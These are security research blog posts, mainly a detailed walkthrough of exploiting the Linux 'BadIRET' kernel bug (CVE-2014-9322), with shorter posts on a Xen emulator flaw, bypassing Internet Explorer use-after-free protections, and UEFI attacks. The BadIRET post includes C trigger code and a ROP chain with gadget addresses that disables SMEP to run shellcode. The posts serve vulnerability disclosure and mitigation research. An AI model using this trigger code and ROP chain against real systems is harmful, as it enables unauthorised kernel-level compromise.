The crucial limitation is that the “reg” pointer is 8 bytes long (assuming x86-64 architecture) and the “seg” field is 4 bytes long (unless the “-fshort-enums” option is passed to the compiler, but that seems not to be the case, at least by default). It means that only the low 4 bytes of “reg” can be controlled, and with a very limited range of values. The biggest possible value of the “enum x86_segment” type that can come from a prefix is 5. If the original value of “reg” was 0xXXXXXXXXYYYYYYYY, we can turn it to 0xXXXXXXXX0000000Z, where Z is in the 0-5 range (and the high 32 bits are unchanged).

Initially, the “reg” field points to the hypervisor stack. In order to understand the impact, we need to know the possible ranges of the hypervisor stack locations. The following information was gathered on a Xen-4.4.1 x86-64 system (particularly, the file xen-4.4.1/xen/include/asm-x86/config.h is very helpful). There are two cases:
1) An attacker controls a VM that can run on physical CPU 0. The stack for CPU 0 resides in the Xen image bss section, so it is located at an address a bit higher than 0xffff82d080000000. After overwrite, this pointer will have the value 0xffff82d00000000Z (again, 0<=Z<=5). This virtual address is mapped and belongs to the compatibility machine-to-phys translation table. This data structure is used only for PV VMs (while the vulnerability can only be triggered from an HVM), therefore (most likely) an attacker needs to control both a PV VM and an HVM to proceed. Even in this case, it is unclear how an ability to control the first entry in the machine-to-phys translation table can help an attacker.
2) An attacker controls a VM that cannot run on physical CPU 0. Hypervisor stacks for CPUs other than 0 are allocated on the Xen heap. The typical address of the stack top is 0xffff830000000000+physical_memory_size-something_small, because memory for CPU stacks is allocated early at Xen boot time, from the top of physical memory (and all physical memory is mapped at the virtual address 0xffff830000000000). After the vulnerability is triggered, the “reg” pointer will have the value 0xffff830V0000000Z, where again 0<=Z<=5, and V=(int)(physical_memory_size_in_GB/4.0). This address is mapped to a single physical frame that can serve any purpose – e.g. it can be used by the dom0 kernel to store crucial pointers. However, it is nontrivial for a malicious VM to force the hypervisor to allocate this frame in a way that would result in reliable privilege escalation. On the other hand, uncontrolled memory corruption in another VM (limited to a single page) is likely.
The good news is that uXen is not vulnerable to this issue. We identified the Xen instruction emulator as a possible attack target a long time ago, and its functionality in uXen is severely limited. Particularly, uXen (when running a microVM) refuses to emulate an instruction with a segment override – if such an instruction is seen, the microVM is killed.

February 2, 2015 / Rafal Wojtczuk

Exploiting “BadIRET” vulnerability (CVE-2014-9322, Linux kernel privilege escalation)

Introduction


CVE-2014-9322 is described as follows:
arch/x86/kernel/entry_64.S in the Linux kernel before 3.17.5 does not
properly handle faults associated with the Stack Segment (SS) segment
register, which allows local users to gain privileges by triggering an IRET
instruction that leads to access to a GS Base address from the wrong space. 

It was fixed on 23rd November 2014 with this commit.
I have seen neither a public exploit nor a detailed discussion about the issue. In this post I will try to explain the nature of the vulnerability and the exploitation steps as clearly as possible; unfortunately I cannot quote the full 3rd volume of Intel Software Developer’s Manuals, so if some terminology is unknown to the reader then details can be found there.
All experiments were conducted on a Fedora 20 system, running a 64-bit 3.11.10-301 kernel; all the discussion is 64-bit-specific.

Short results summary:

  1. With the tested kernel, the vulnerability can be reliably exploited to achieve kernel-mode arbitrary code execution.

  2. SMEP does not prevent arbitrary code execution; SMAP does prevent arbitrary code execution.

Digression: kernel, usermode, iret

The vulnerability

In a few cases, when the Linux kernel returns to usermode via iret, this instruction throws an exception. The exception handler returns execution to the bad_iret function, which does

     /* So pretend we completed the iret and took the #GPF in user mode.*/
     pushq $0
     SWAPGS
     jmp general_protection

As the comment explains, the subsequent code flow should be identical to the case when
general protection exception happens in user mode (just jump to the #GP handler). This works well in case of most of the exceptions that can be raised by iret, e.g. #GP.

The problematic case is the #SS exception. If a kernel is vulnerable (so, before kernel version 3.17.5) and has “espfix” functionality (introduced around kernel version 3.16), then bad_iret executes with a read-only stack – the “push” instruction generates a page fault that gets converted into a double fault. I have not analysed this scenario; from now on, we focus on pre-3.16 kernels, with no “espfix”.

The vulnerability stems from the fact that the exception handler for the #SS exception does not fit the “pretend-it-was-#GP-in-userspace” schema well. In comparison with e.g. #GP handler, the #SS exception handler does one extra swapgs instruction. In case you are not familiar with swapgs semantics, read the below paragraph, otherwise skip it.

Digression: swapgs instruction

When memory is accessed with gs segment prefix, like this:

mov %gs:LOGICAL_ADDRESS, %eax

the following actually happens:

  1. BASE_ADDRESS value is retrieved from the hidden part of the segment register
  2. memory at linear address LOGICAL_ADDRESS+BASE_ADDRESS is dereferenced

The base address is initially derived from the Global Descriptor Table (or LDT). However, there are situations where the GS segment base is changed on the fly, without involving the GDT.

Quoting the SDM:
“SWAPGS exchanges the current GS base register value with the value contained in MSR address C0000102H (IA32_KERNEL_GS_BASE). The SWAPGS instruction is a privileged instruction intended for use by system software. (…) The kernel can then use the GS prefix on normal memory references to access [per-cpu] kernel data structures.”
For each CPU, the Linux kernel allocates at boot time a fixed-size structure holding crucial data. Then, for each CPU, Linux loads IA32_KERNEL_GS_BASE with this structure’s address. Therefore, the usual pattern of e.g. a syscall handler is:

  1. swapgs (now the gs base points to kernel memory)
  2. access per-cpu kernel data structures via memory instructions with gs prefix
  3. swapgs (it undoes the result of the previous swapgs, gs base points to usermode memory)
  4. return to usermode

Naturally, kernel code must ensure that whenever it wants to access per-cpu data with the gs prefix, the number of swapgs instructions executed by the kernel since entry from usermode is odd (so that the gs base points to kernel memory).

Triggering the vulnerability

By now it should be obvious that the vulnerability is grave – because of one extra swapgs in the vulnerable code path, the kernel will try to access important data structures with a wrong gs base, controllable by the user.
When is the #SS exception thrown by the iret instruction? Interestingly, the Intel SDM is incomplete in this aspect; in the description of the iret instruction, it says:

 64-Bit Mode Exceptions:
 #SS(0)
 If an attempt to pop a value off the stack violates the SS limit.
 If an attempt to pop a value off the stack causes a non-canonical address
 to be referenced.

None of these conditions can be forced to happen in kernel mode. However, the pseudocode for iret (in the same SDM) shows another case: when the segment defined by the return frame is not present:

IF stack segment is not present
THEN #SS(SS selector); FI;

So, in usermode, we need to set the ss register to something not present. It is not straightforward: we cannot just use

mov $nonpresent_segment_selector, %eax
mov %ax, %ss

as the latter instruction will generate #GP. Setting ss via debugger/ptrace is disallowed; similarly, the sys_sigreturn syscall does not set this register on 64-bit systems (it might work on 32-bit, though). The solution is:

  1. thread A: create a custom segment X in LDT via sys_modify_ldt syscall
  2. thread B: ss:=X_selector
  3. thread A: invalidate X via sys_modify_ldt
  4. thread B: wait for hardware interrupt

The reason why one needs two threads (both in the same process) is that the return from the syscall (including sys_modify_ldt) is done via the sysret instruction, which hardcodes the ss value. If we invalidated X in the same thread that did the “ss:=X” instruction, ss would be undone.
Running the above code results in a kernel panic. In order to do something more meaningful, we will need to control the usermode gs base; it can be set via the arch_prctl(ARCH_SET_GS) syscall.
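
For the curious, a user-space sketch of the four-step trigger might look as follows (a minimal sketch, Linux-specific, compiled with -pthread; the user_desc fields come from asm/ldt.h, and the selector 0x0f encodes LDT index 1 with TI=1 and RPL=3 – do not run this on a vulnerable kernel you care about):

#include <asm/ldt.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <pthread.h>
#include <string.h>

static void set_ldt_entry(int present)
{
    struct user_desc d;
    memset(&d, 0, sizeof(d));
    d.entry_number    = 1;        /* segment X: LDT slot 1 */
    d.limit           = 0xfffff;
    d.seg_32bit       = 1;
    d.limit_in_pages  = 1;
    d.seg_not_present = !present;
    syscall(SYS_modify_ldt, 1, &d, sizeof(d));
}

static void *thread_B(void *arg)
{
    unsigned short sel = 0x0f;                 /* index 1, TI=LDT, RPL=3 */
    asm volatile("mov %0, %%ss" :: "r"(sel));  /* step 2: ss := X */
    for (;;) pause();                          /* step 4: wait for a hardware
                                                  interrupt; iret raises #SS */
    return NULL;
}

int main(void)
{
    pthread_t t;
    set_ldt_entry(1);                          /* step 1: create X, present */
    pthread_create(&t, NULL, thread_B, NULL);
    sleep(1);                                  /* crude ordering, not a sync */
    set_ldt_entry(0);                          /* step 3: mark X not-present */
    pthread_join(t, NULL);
    return 0;
}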

Achieving write primitive

If we run the above code, then the #SS handler runs fine (meaning: it will not touch memory at the gs base), and returns into bad_iret, which in turn jumps to the #GP exception handler. This runs fine for a while, and then calls the following function:

289 dotraplinkage void
290 do_general_protection(struct pt_regs *regs, long error_code)
291 {
292         struct task_struct *tsk;
...
306         tsk = current;
307         if (!user_mode(regs)) {
                ... it is not reached
317         }
318 
319         tsk->thread.error_code = error_code;
320         tsk->thread.trap_nr = X86_TRAP_GP;
321 
322         if (show_unhandled_signals && unhandled_signal(tsk, SIGSEGV) &&
323                         printk_ratelimit()) {
324                 pr_info("%s[%d] general protection ip:%lx sp:%lx error:%lx",
325                         tsk->comm, task_pid_nr(tsk),
326                         regs->ip, regs->sp, error_code);
327                 print_vma_addr(" in ", regs->ip);
328                 pr_cont("\n");
329         }
330 
331         force_sig_info(SIGSEGV, SEND_SIG_PRIV, tsk);
332 exit:
333         exception_exit(prev_state);
334 }

It is far from obvious from the C code, but the assignment to tsk from the current macro uses a memory read with the gs prefix. Line 306 is actually:

0xffffffff8164b79d :	mov    %gs:0xc780,%rbx

This gets interesting. We control the “current” pointer, which points to the giant data structure describing the whole Linux process. Particularly, the lines

319         tsk->thread.error_code = error_code;
320         tsk->thread.trap_nr = X86_TRAP_GP;

are writes to addresses (at some fixed offset from the beginning of the task struct) that we control. Note that the values being written are not controllable (they are the constants 0 and 0xd, respectively), but this should not be a problem. Game over?

Not quite. Say, we want to overwrite some important kernel data structure at X. If we do the following steps:

  1. prepare usermode memory at FAKE_PERCPU, and set gs base to it
  2. Make the location FAKE_PERCPU+0xc780 hold the pointer FAKE_CURRENT_WITH_OFFSET, such that FAKE_CURRENT_WITH_OFFSET = X - offsetof(struct task_struct, thread.error_code)
  3. trigger the vulnerability

Then indeed do_general_protection will write to X. But soon afterwards it will try to access other fields in the current task_struct again; e.g. the unhandled_signal() function dereferences a pointer from task_struct. We have no control over what lies beyond X, and the result will be a page fault in the kernel.
How can we cope with this? Options:

  1. Do nothing. Linux kernel, unlike e.g. Windows, is quite permissive when it gets an unexpected page fault in kernel mode – if possible, it kills the current process, and tries to continue (while Windows bluescreens immediately).
    This does not work – the result is massive kernel data corruption and whole system freeze. My suspicion is that after the current process is killed, the swapgs imbalance persists, resulting in many unexpected page faults in the context of the other processes.

  2. Use the “tsk->thread.error_code = error_code” write to overwrite IDT entry for the page fault handler. Then the page fault (triggered by, say, unhandled_signal()) will result in running our code. This technique proved to be successful on a couple of occasions before.
    This does not work, either, for two reasons:

    • Linux makes IDT read-only (bravo!)
    • even if IDT was writeable, we do not control the overwrite value – it is 0 or 0xd. If we overwrite the top DWORDs of the IDT entry for #PF, the resulting address will be in usermode, and SMEP will prevent handler execution (more on SMEP later). We could nullify the lowest one or two bytes of the legal handler address, but the chances of these two addresses being a useful stack pivot sequence are negligible.
  3. We can try a race. Say the “tsk->thread.error_code = error_code” write facilitates code execution, e.g. allows us to control a code pointer P that is called via SOME_SYSCALL. Then we can trigger our vulnerability on CPU 0, and at the same time CPU 1 can run SOME_SYSCALL in a loop. The idea is that we will get code execution via CPU 1 before damage is done on CPU 0, and e.g. hook the page fault handler, so that CPU 0 can do no more harm.
    I tried this approach a couple of times, with no luck; perhaps with a different vulnerability the timings would be different and it would work better.

  4. Throw in the towel on the “tsk->thread.error_code = error_code” write.

With some disgust, we will follow the last option. We will point “current” to a usermode location, setting the pointers in it so that the read dereferences on them hit our (controlled) memory. Naturally, we inspect the subsequent code to find more pointer write dereferences.

Achieving write primitive continued, aka life after do_general_protection

Our next chance is the function called by do_general_protection():

int
force_sig_info(int sig, struct siginfo *info, struct task_struct *t)
{
        unsigned long int flags;
        int ret, blocked, ignored;
        struct k_sigaction *action;

        spin_lock_irqsave(&t->sighand->siglock, flags);
        action = &t->sighand->action[sig-1];
        ignored = action->sa.sa_handler == SIG_IGN;
        blocked = sigismember(&t->blocked, sig);   
        if (blocked || ignored) {
                action->sa.sa_handler = SIG_DFL;
                if (blocked) {
                        sigdelset(&t->blocked, sig);
                        recalc_sigpending_and_wake(t);
                }
        }
        if (action->sa.sa_handler == SIG_DFL)
                t->signal->flags &= ~SIGNAL_UNKILLABLE;
        ret = specific_send_sig_info(sig, info, t);
        spin_unlock_irqrestore(&t->sighand->siglock, flags);

        return ret;
}

The field “sighand” in task_struct is a pointer that we can set to an arbitrary value. It means that the

action = &t->sighand->action[sig-1];
action->sa.sa_handler = SIG_DFL;

lines are another chance for a write primitive to an arbitrary location. Again, we do not control the write value – it is the constant SIG_DFL, equal to 0.
This finally works, hurray! With a little twist. Assume we want to overwrite location X in the kernel. We prepare our fake task_struct (particularly the sighand field in it) so that X = the address of t->sighand->action[sig-1].sa.sa_handler. But a few lines above, there is the line

spin_lock_irqsave(&t->sighand->siglock, flags);

As t->sighand->siglock is at a constant offset from t->sighand->action[sig-1].sa.sa_handler, it means the kernel will call spin_lock_irqsave on some address located after X, say at X+SPINLOCK, whose content we do not control. What happens then?
There are two possibilities:

  1. memory at X+SPINLOCK looks like an unlocked spinlock. spin_lock_irqsave will complete immediately. Final spin_unlock_irqrestore will undo the writes done by spin_lock_irqsave. Good.
  2. memory at X+SPINLOCK looks like a locked spinlock. spin_lock_irqsave will loop waiting for the spinlock – infinitely, if we do not react.
    This is worrying. In order to bypass this, we will need another assumption – we will need to know we are in this situation, meaning we will need to know the contents of memory at X+SPINLOCK. This is acceptable – we will see later that we will set X to be in kernel .data section. We will do the following:

    • initially, prepare FAKE_CURRENT so that t->sighand->siglock points to a locked spinlock in usermode, at SPINLOCK_USERMODE
    • force_sig_info() will hang in spin_lock_irqsave
    • at this moment, another usermode thread running on another CPU will change t->sighand, so that t->sighand->action[sig-1].sa.sa_handler is our overwrite target, and then unlock SPINLOCK_USERMODE
    • spin_lock_irqsave will return.
    • force_sig_info() will reload t->sighand, and perform the desired write.

A careful reader is encouraged to consider why this approach cannot be used in the case where X+SPINLOCK is initially unlocked.
This is not all yet – we will need to prepare a few more fields in FAKE_CURRENT so that as little code as possible is executed. I will spare you the details – this blog is way too long already. The bottom line is that it works. What happens next? force_sig_info() returns, and do_general_protection() returns. The subsequent iret will throw #SS again (because the usermode ss value on the stack still refers to a non-present segment). But this time, the extra swapgs instruction in the #SS handler will return the balance to the Force, cancelling the effect of the previous incorrect swapgs. do_general_protection() will be invoked and operate on the real task_struct, not FAKE_CURRENT. Finally, the current task will be sent SIGSEGV, and another process will be scheduled for execution. The system remains stable.


Digression: SMEP

SMEP is a feature of Intel processors, starting from the 3rd generation of Core processors. If the SMEP bit is set in CR4, the CPU will refuse to execute code with kernel privileges if the code resides in usermode pages. Linux enables SMEP by default if available.

Achieving code execution

The previous paragraphs showed a way to overwrite 8 consecutive bytes in kernel memory with 0. How to turn this into code execution, assuming SMEP is enabled?
Overwriting a kernel code pointer would not work. We can either nullify its top bytes – but then the resulting address would be in usermode, and SMEP will prevent dereference of this pointer. Alternatively, we can nullify a few low bytes, but then the chances that the resulting pointer would point to a useful stack pivot sequence are low.
What we need is a kernel pointer P to structure X, that contains code pointers. We can overwrite top bytes of P so that the resulting address is in usermode, and P->code_pointer_in_x() call will jump to a location that we can choose.
I am not sure what is the best object to attack. For my experiments, I chose the kernel proc_root variable. It is a structure of type

struct proc_dir_entry {
            ...
        const struct inode_operations *proc_iops;
        const struct file_operations *proc_fops;
        struct proc_dir_entry *next, *parent, *subdir;
        ...
        u8 namelen;
        char name[];
};

This structure represents an entry in the proc filesystem (and proc_root represents the root of the /proc filesystem). When a filename path starting with /proc is looked up, the “subdir” pointers (starting with proc_root.subdir) are followed, until the matching name is found. Afterwards, pointers from proc_iops are called:

struct inode_operations {
        struct dentry * (*lookup) (struct inode *,struct dentry *, unsigned int);
        void * (*follow_link) (struct dentry *, struct nameidata *);
        ...many more...
        int (*update_time)(struct inode *, struct timespec *, int);
        ...
} ____cacheline_aligned;

proc_root resides in the kernel data section. It means that the exploit needs to know its address. This information is available from /proc/kallsyms; however, many hardened kernels do not allow unprivileged users to read from this pseudofile. Still, if the kernel is a known build (say, shipped with a distribution), this address can be obtained offline, along with the tens of offsets required to build FAKE_CURRENT.
So, we will overwrite proc_root.subdir so that it becomes a pointer to a controlled struct proc_dir_entry residing in usermode. A slight complication is that we cannot overwrite the whole pointer. Remember, our write primitive is “overwrite with 8 zeroes”. If we made proc_root.subdir be 0, we would not be able to map it, because Linux does not allow usermode to map address 0 (more precisely, any address below /proc/sys/vm/mmap_min_addr, but the latter is 4k by default). It means we need to:

  1. map 16MB of memory at address 4096
  2. fill it with a pattern resembling proc_dir_entry, with the inode_operations field pointing to the usermode address FAKE_IOPS, and the name field being the string “A”.
  3. configure the exploit to overwrite the top 5 bytes of proc_root.subdir

Then, unless the bottom 3 bytes of proc_root.subdir are 0, we can be sure that after triggering the overwrite in force_sig_info(), proc_root.subdir will point to controlled usermode memory. When our process calls open(“/proc/A”, …), pointers from FAKE_IOPS will be called. What should they point to?
If you think the answer is “to our shellcode”, go back and read again.

We will need to point the FAKE_IOPS pointers to a stack pivot sequence. This again assumes knowledge of the precise version of the kernel running. The usual “xchg %esp, %eax; ret” code sequence (it is only two bytes, 94 c3, found at 0xffffffff8119f1ed in the case of the tested kernel) works very well for 64-bit kernel ROP. Even if there is no control over %rax, this xchg instruction operates on 32-bit registers, thus clearing the high 32 bits of %rsp, and landing %rsp in usermode memory. In the worst case, we may need to allocate the low 4GB of virtual memory and fill it with the rop chain.
In the case of the tested kernel, two different ways to dereference pointers in FAKE_IOPS were observed:

  1. %rax:=FAKE_IOPS; call *SOME_OFFSET(%rax)
  2. %rax:=FAKE_IOPS; %rax:=SOME_OFFSET(%rax); call *%rax

In the first case, after %rsp is exchanged with %rax, it will be equal to FAKE_IOPS. We need the rop chain to reside at the beginning of FAKE_IOPS, so it needs to start with something like “add $A_LOT, %rsp; ret”, and continue after the end of FAKE_IOPS pointers.
In the second case, the %rsp will be assigned the low 32bits of the call target, so 0x8119f1ed. We need to prepare the rop chain at this address as well.
To sum up, as the %rax value has one of two known values at the moment of the entry to the stack pivot sequence, we do not need to fill the whole 4G with rop chain, just the above two addresses.
The ROP chain itself is straightforward, shown for the second case:

unsigned long *stack = (unsigned long *)0x8119f1ed;
*stack++ = 0xffffffff81307bcdULL;  // pop %rdi; ret
*stack++ = 0x407e0;                // cr4 value with the SMEP bit cleared
*stack++ = 0xffffffff8104c394ULL;  // mov %rdi, %cr4; pop %rbp; ret
*stack++ = 0xaabbccdd;             // placeholder for %rbp
*stack++ = actual_shellcode_in_usermode_pages;


Digression: SMAP

SMAP is a feature of Intel processors, starting from the 5th generation of Core processors. If the SMAP bit is set in CR4, the CPU will refuse to access memory with kernel privileges if this memory resides in usermode pages. Linux enables SMAP by default if available. A test kernel module (run on a system with a Core-M 5Y10a CPU) that tries to access usermode crashes with:

[  314.099024] running with cr4=0x3407e0
[  389.885318] BUG: unable to handle kernel paging request at 00007f9d87670000
[  389.885455] IP: [ffffffffa0832029] test_write_proc+0x29/0x50 [smaptest]
[  389.885577] PGD 427cf067 PUD 42b22067 PMD 41ef3067 PTE 80000000408f9867
[  389.887253] Code: 48 8b 33 48 c7 c7 3f 30 83 a0 31 c0 e8 21 c1 f0 e0 44 89 e0 48 8b 

As we can see, although the usermode page is present, access to it throws a page fault.
Windows systems do not seem to support SMAP; Windows 10 Technical Preview build 9926 runs with cr4=0x1506f8 (SMEP set, SMAP unset); in comparison with Linux (which was tested on the same hardware) you can see that bit 21 in cr4 is not set. This is not surprising; in the case of Linux, access to usermode is performed explicitly, via copy_from_user, copy_to_user and similar functions, so it is doable to turn off SMAP temporarily for the duration of these functions. On Windows, kernel code accesses usermode directly, just wrapping the access in an exception handler, so it is more difficult to adjust all the drivers in all the required places to work properly with SMAP.

SMAP to the rescue!

The above exploitation method relied on preparing certain data structures in usermode and forcing the kernel to interpret them as trusted kernel data. This approach will not work with SMAP enabled – the CPU will refuse to read malicious data from usermode.
What we could do is to craft all the required data structures, and then copy them to the kernel. For instance if one does

write(pipe_filedescriptor, evil_data, ...

then evil_data will be copied to a kernel pipe buffer. We would need to guess its address; some sort of heap spraying, combined with the fact that there is no spoon^W effective kernel ASLR, could work, although it is likely to be less reliable than exploitation without SMAP.
However, there is one more hurdle – remember, we need to set the usermode gs base to point to our exploit data structures. In the scenario above (without SMAP), we used the arch_prctl(ARCH_SET_GS) syscall, which is implemented in the following way in the kernel:

long do_arch_prctl(struct task_struct *task, int code, unsigned long addr)
{ 
         int ret = 0; 
         int doit = task == current;
         int cpu;
 
         switch (code) { 
         case ARCH_SET_GS:
                 if (addr >= TASK_SIZE_OF(task))
                         return -EPERM; 
                 ... honour the request otherwise

Houston, we have a problem – we cannot use this API to set the gs base above the end of usermode memory!
Recent CPUs feature the wrgsbase instruction, which sets the gs base directly. It is a nonprivileged instruction, but it needs to be enabled by the kernel by setting the FSGSBASE bit (bit 16) in CR4. Linux does not set this bit, and therefore usermode cannot use this instruction.

On 64-bit, non-system entries in the GDT and LDT are still 8 bytes long, and the base field is at most 4G-1 – so there is no chance to set up a segment with a base address in kernel space.
So, unless I missed another way to set usermode gs base in the kernel range, SMAP protects 64bit Linux against achieving arbitrary code execution via exploiting CVE-2014-9322.

January 17, 2015 / Jared DeMott

Use-after-Free: New Protections, and how to Defeat them

The Problem

Memory corruption has plagued computers for decades, and these bugs can often be transformed into working cyber-attacks. Memory corruption is a situation where an attacker (malicious user of an application or network protocol) is able to send some data that is improperly processed by the native computer code. That can lead to important control structure changes that allow the attacker unexpected influence over the path a program will travel.

High-level protections, such as anti-virus (AV), have done little to stop the tide. That is because AV is poor at reacting to threats if they do not exist in their list of known attacks. Recent low-level operating system (OS) protections have helped. Non-executable memory and code module randomization help prevent attackers from leveraging memory corruption bugs, by stopping injected code from successfully executing.

Yet a new memory corruption exploit variant called return-oriented programming (ROP) has survived these defenses. ROP operates by leveraging existing code in memory to undo non-executable memory protections. New medium-level defenses, such as Microsoft’s anti-ROP add-on called EMET, have helped some. But a particularly troublesome bug known as Use-after-Free (UaF) has been applied in conjunction with other techniques to bypass EMET (See Prior Blog HERE). UaFs have been the basis of many current cyber attacks including Operation SnowMan (CVE-2014-0322) and Operation Clandestine Fox (CVE-2014-1776). Thus, it is clear that further low-level mitigations are required.

The Solution

To address the problem of UaF attacks, browser vendors have implemented new protections within the browser process. A UaF happens when (1) a low-level data structure (called an object in C++) is released prematurely. (2) An attacker knows about this release and quickly fills that space with data they control. (3) A dangling reference to the original object, which another part of the program assumes is still valid, is used. But of course, the attacker has meanwhile changed the object’s data. The intruder can now leverage the influence afforded by the corrupted memory state to hijack the compromised program.
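
A contrived C++ illustration of those three steps (a toy under the assumption that the allocator reuses the freed slot, which is exactly the behavior the protections below try to prevent):

#include <cstdio>
#include <cstring>

// Toy use-after-free, condensed to the three steps above. Whether the freed
// slot is actually reused depends on the allocator; dereferencing v after
// delete is undefined behavior and shown purely for illustration.
struct Victim {
    virtual void greet() { std::puts("legitimate behavior"); }
};

int main()
{
    Victim *v = new Victim;                  // (1) object released prematurely
    delete v;

    char *spray = new char[sizeof(Victim)];  // (2) attacker refills the slot
    std::memset(spray, 0x41, sizeof(Victim));

    // (3) the dangling reference is used: if the slot was reused, the vtable
    // pointer now reads 0x4141..., so v->greet() would jump into attacker data.
    std::printf("dangling vptr: %p\n", *(void **)v);

    delete[] spray;
    return 0;
}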

Microsoft chose to tackle this serious UaF problem with two new protections. These protections work together to stop attackers from being able to allocate new data in the spot where a dangling reference points. They call the new protections Heap Isolation and Delayed Free. The premise of these protections is simple. Heap Isolation creates a new heap. A heap is a place that a program uses to create/free internal data as needed throughout execution. This new isolated heap houses many internal Internet Explorer objects, while objects likely to be under the influence of attacks (like strings created via JavaScript) are still allocated on the typical default heap. Thus, if a UaF condition appears, the attacker should not be able to replace the memory of the dangling pointer with malicious data. We could liken this situation to forcing naughty school kids to use a separate playground from the trusted kids. But who is naughty and who is good? An obvious weakness with this approach is that, with the many different objects used in a complex program like a browser, it is difficult for developers to perfectly separate the two groups of objects.

So Microsoft also created a second clever protection. Delayed Free operates by not releasing an object’s memory right away. In our analogy, if we assume the goal of the naughty kid is to steal the place in line from a good kid that unexpectedly stepped out of line, we can think of this protection as the playground teacher watching that place in line for a while, before the slot is finally opened. Even though the program has asked the allocator to free a chunk of memory, the object is not freed, but is instead put on a list to be freed later, when the playground looks safer. That way, even if an attacker knows of an object type on both heaps that could be used to replace the memory backing a dangling reference, they cannot use it, since the memory has not actually been freed yet. The memory will not be truly freed until the following conditions are met: there are no references to the object on the stack and there are at least 100,000 bytes waiting to be freed, or the per-thread call stack unwinds fully to its original starting point.

Evaluation

Though the new protections are definitely helpful, and I even recommend applying them to other applications, no native mitigation is enough. If we look back at the history of memory corruption, we see that every time vendors put forth a new OS security measure, it worked in slowing attackers for a season, but before long each mitigation was bypassed by some clever new attack.

In my research, I show that one such bypass against these new protections involves using what I call a “long lived” dangling pointer. In my naughty child analogy, we can think of this as the sneaky and patient child that can go to either playground, and will wait for just the right moment before slipping ahead in line. In more technical terms, if an attacker can locate a UaF bug that involves code that maintains a heap reference to a dangling pointer, the conditions to actually free the object under the deferred free protection can be met (no stack references, or the call chain eventually unwinds). And finding useful objects in either playground to replace the original turns out not to be that difficult either. I wrote a python script to search the core Internet Explorer code module (called MSHTML.dll). The script finds all the different objects, their sizes, and notes whether each is allocated to the default or isolated heap. This information can be used to help locate useful objects to attack either heap. And with a memory garbage-collection process known as coalescing, the replacement object does not even have to be the same size as the original object. This is useful for changing critical data (like the vtable pointer) at the proper offset in what was the original object. The python code is HERE. For complete details on this research, please see the slides from my January 17th ShmooCon talk HERE.

January 6, 2015 / Rafal Wojtczuk

CCC31 talk about UEFI security

Recently I presented a talk at the 31st Chaos Communication Congress (together with Corey Kallenberg) titled “Attacks on UEFI security”. We described (and demoed) vulnerabilities allowing us to achieve write access to the flash chip (that stores UEFI code) and to SMM memory (that holds the code for the all-powerful System Management Mode). The CERT vulnerability notes are here, here and here; you are also encouraged to read the presentation, the whitepaper and the second whitepaper.
TL;DR-style, these vulnerabilities are useful for an attacker who already has administrative privileges in the operating system and wants to install a UEFI-based or SMM-based rootkit. So no, the sky is not falling, and this type of attack is not seen often in the wild. Yet some well-known cases exist, and as the topic has gained quite some attention recently, there might be more in the future.
